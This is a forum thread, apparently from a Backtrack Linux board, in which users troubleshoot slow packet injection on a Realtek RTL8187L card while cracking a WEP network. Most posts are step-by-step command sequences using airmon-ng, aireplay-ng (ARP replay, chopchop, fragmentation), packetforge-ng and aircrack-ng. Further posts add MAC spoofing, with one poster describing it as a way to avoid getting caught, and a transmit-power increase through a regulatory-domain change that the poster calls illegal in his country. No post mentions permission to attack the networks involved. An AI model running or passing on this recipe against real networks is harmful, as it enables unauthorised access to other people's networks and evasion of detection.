Realtek RTL8187L Packet Injection speed issue in Backtrack 5 R1

[joecrank]

Hello to everyone. I have an Asus M2N32SLI DELUXE motherboard that have the RTL8187L chipset integrated.

1. I am using (and experimenting) with Backtrack 5 R1

2. I boot from the Backtrack 5 R1 boot DVD from the Post.


The Problems= I do all the process until the packet injection. But I saw that always the DATA field is receiving data very slowly, although the pps= 499 or 500. I remember that the Tx = -60 or something like that, since I read that this represent the actual voltage set in the Wireless Network card.....

I want to know if someone knows how to speed up this process, since the instructions for cracking the WEP explain that for start to crack the WEP key we need to have about 20,000 data packets or IV's.

For example, I wait about 2 hours, and the Data field just have 399 packets, VERY SLOWWWWWWW.

Well, remember I use the Backtrack 5 R1 boot DVD.

I wait for an answer.

Bye

[ShadowMaster]

Just because you're transmitting does not mean you are injecting. You need to try different attacks. If you give me a list of EVERY command, start to finish, that you have used, and what type of network(WEP/SKA/OPEN...) you have used them on, then I'd be more than happy to give you suggestions.

[iproute]

if signal strength is low, slowing how many packets per second are being injected can help greatly. You will see less packet drops inn airodump when you're at a good speed.
use the -x option with aireplay to control the number of PPS. Default is 500, sometimes I might do 200 sometimes I might do 25. Depends on the signal strength and I've seen some routers sort of get overloaded if you hit them too much.

[ShadowMaster]

Again, just because packets are being sent from your card does not mean the AP is responding to them. I've tested many networks, and when the AP wasn't responding, then it wouldn't respond no matter how pps you were sending 1 or 1000. Sending fewer packets only helps when the AP is generating IVs anyway, but can't keep up with you. His AP is not. Otherwise, he'd have a lot more IVs than 399. Therefore, he has not succesfully injected anything. Your best bet is to switch up attacks and hope the router responds to that one. Also again, I'd be very happy to help. I enjoy doing this kind of thing.

[joecrank]

Hello Mr. ShadowMaster. Thanks for answer. The Wireless network is a WEP based encription. Well, I read you want to see what commands I used when doing all the process, right ?. If so, here is a list of all:

1. iwconfig

2. airmon-ng stop [device]

3. ifconfig [interface] down

4. macchanger --mac 00:11:22:33:44:66 [device]

5. airmon-ng start [device]

6. airodump-ng [device]

7. airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

9. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

10. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

11. aircrack-ng -n 128 -b [bssid] [filename]-01.cap


Well, I hope this can help you. But remember that I saw a Power Level (Tx) of only 20 db in my wireless card when I execute the command "iwconfig".


See you new friend,

thanks

[zimmaro]

hy,
-first operation for increase txpower (in MY country is not legal!)
iw reg set BO ".........livia"
iwconfig [device :es wlan0] txpower 30
airmon-ng start wlan0
ecc......ecc...
for my little experience an increase in the txpower works well in "receiving data"), but for "normal-connection" is more stable 20db! in my alpha
bye

[legitnick]

Try a simple injection test(replace wlan0 with your wireless interface) also you must set your card to monitor mode and to the desired channel with airmon-ng prior to running any of the tests.

Code:

 aireplay-ng -9 wlan0

You can also take a look at the documentation:

Usage

aireplay-ng -9 -e teddy -a 00:de:ad:ca:fe:00 -i wlan1 wlan0

Where:

-9 means injection test. Long form is --test.
-e teddy is the network name (SSID). This is optional.
-a 00:de:ad:ca:fe:00 ath0 is MAC address of the access point (BSSID). This is optional.
-i wlan1 is interface name of the second card if you want to determine which attacks your card supports. This interfaces acts as an AP and receives packets. This is optional.
wlan0 is the interface name or airserv-ng IP Address plus port number. This interface is used to send packets. For example - 127.0.0.1:666. (Mandatory)

Sometimes you aren't physically close enough to inject packets, if you have $30 to blow I'd suggest getting an Alfa AWUS036H.

[ShadowMaster]

Hello Mr. ShadowMaster. Thanks for answer. The Wireless network is a WEP based encription. Well, I read you want to see what commands I used when doing all the process, right ?. If so, here is a list of all:

1. iwconfig

2. airmon-ng stop [device]

3. ifconfig [interface] down

4. macchanger --mac 00:11:22:33:44:66 [device]

5. airmon-ng start [device]

6. airodump-ng [device]

7. airodump-ng -c [channel] -w [network.out] –bssid [bssid] [device]

8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

9. aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

10. aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

11. aircrack-ng -n 128 -b [bssid] [filename]-01.cap


Well, I hope this can help you. But remember that I saw a Power Level (Tx) of only 20 db in my wireless card when I execute the command "iwconfig".


See you new friend,

thanks

Sorry for the delay. Ok, from what I see you've been using a both an ARP replay and an interactive packet replay. Since you didn't specify, I'm gonna assume no SKA to bypass. So. Try this
iwconfig

2. airmon-ng stop [device]

3. ifconfig [interface] down

4. macchanger --mac 00:11:22:33:44:66 [device]

5. airmon-ng start [device]

6. airodump-ng [device]

7. airodump-ng -c [channel] -w [network.out] –-bssid [bssid] [device]

8. aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]
now i start running into issues. by default, without the -h, aireplay will use the device mac. Since you've already changed, why keep putting it in? Try it without the -h to see that I'm correct and save yourself a lot of typing. If not, just keep it this way. Moving on...

9. aireplay-ng -4 -a [bssid] [device] (remember to add -h if I'm wrong)
if this attack fails then try this one
9.a aireplay-ng -5 -b [bssid] [device]
both of these will get you the PRGA XOR stream to forge an arp packet to inject.

when one of them works, get the .xor file that was outputted (ls, or just read the terminal, itll say after the attack succeeds.)

now things get complicated. if you used attack -4 (korek chopchop) then use tcpdump to view the saved decrypted packet which is listed in the terminal output)
tcpdump -s0 -n -e -r [packet] [usually something like packet-dec-xxxx.cap)
search for the ip address inside the packet and remember it

if you used packet fragmentation (-5) then its easier but not necessarily as effective. (no arp amplification.)
You're just gonna use broadcast addresses for the ips.
for -5
packetforge-ng -0 -a [bssid] -h [device mac] -k 255.255.255.255 -l 255.255.255.255 -y [.xor file] -w arppac.cap

for -4
packetforge-ng -0 -a [bssid] -h [device mac] -k [valid ip on network] -l [use the ip scheme (i.e. 192.168.1.) it should usually be 192.168.[different things] use it to create something like this ipscheme.ipscheme.ipscheme.255 (example 192.168.40.255)] -y [.xor file] -w arppac.cap
this command is confusing so ill give a full example
packetforge-ng -0 -a [bssid] -h [device mac] -k 192.168.2.45 -l 192.168.2.255 -y [.xor file] -w arppac.cap

next
aireplay-ng -2 -r arppac.cap

if this doesn't inject, let me know, and we will try another attack.
if it does inject then wait until at least 20,000 data# then
aircrack-ng [-w file from airodump-ng]
Don't use any modifiers, it wont really help, and this way has cracked keys in less then a second for me with 50,000+ and in 5-10 seconds with 10,000-20,000.
btw the script located http://www.backtrack-linux.org/forum...ifi-101-a.html there should help a lot.
let me know what you do.

[snafu777]

ShadowMaster,

Thank you for the post man! I didn't really get the response I was looking for with my script; but with what you just posted advising people to use my script.... I have a smile the size of Texas across my face. Thank you so much!!!

[snafu777]

Hello Mr. ShadowMaster. Thanks for answer. The Wireless network is a WEP based encription. Well, I read you want to see what commands I used when doing all the process, right ?. If so, here is a list of all:

......
3. ifconfig [interface] down

4. macchanger --mac 00:11:22:33:44:66 [device]

5. airmon-ng start [device]

If you change the MAC address of the physical device and then use airmon-ng you defeat the purpose of a MAC change =)....do an ifconfig of the physical device and look at the mac, then macchange it....then airmon-ng start it, then ifconfig the virtual device (mon0)....mon0 will have the MAC that is burned into the card =)...You need to do the steps in this order bro =)...Out of sheer curiosity, why are ya changing MACs =)...I only change my MAC when I want to play sneaky games...(i.e....Not be Caught)

Code:

airmon-ng start <dev>
ifconfig <dev> down
ifconfig mon0 down
macchanger -m 00:11:22:33:44:66 <dev>
macchanger -m 00:11:22:33:44:66 mon0
ifconfig <dev> up
ifconfig mon0 up